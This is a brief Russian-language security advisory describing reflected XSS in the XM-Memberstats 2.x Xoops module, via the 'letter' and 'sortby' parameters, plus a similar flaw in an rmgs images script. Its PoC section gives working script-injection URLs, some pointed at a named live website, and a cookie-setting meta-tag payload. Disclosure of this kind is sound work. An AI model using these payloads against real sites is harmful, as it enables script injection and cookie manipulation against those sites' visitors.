Программа: XM-Memberstats (module for Xoops) 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в в параметрах "letter" и "sortby" сценарием xmmemberstats/index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

XSS PoC :

http://www.website.com/modules/xmmemberstats/index.php? letter=A&sortby=[xss]&orderby=ASC&page=10
http://www.website.com/modules/rmgs/images.php?kw=1000&q=[xss]

http://www.euskadienduro.com/modules/xmmemberstats/index.php? letter=A&sortby=<script%20%0a%0d>alert(69)%3B </script>&orderby=ASC&page=10

http://www.euskadienduro.com/modules/rmgs/images.php?kw=1000 &q=>’><script%20%0a%0d>alert(69)%3B</script>

Манипуляция Cookies PoC:

http://www.website.com/modules/xmmemberstats/index.php?letter=A& sortby=<meta+http-equiv=’Set-cookie’+content=’ cookiename=cookievalue’>

 



Оставить мнение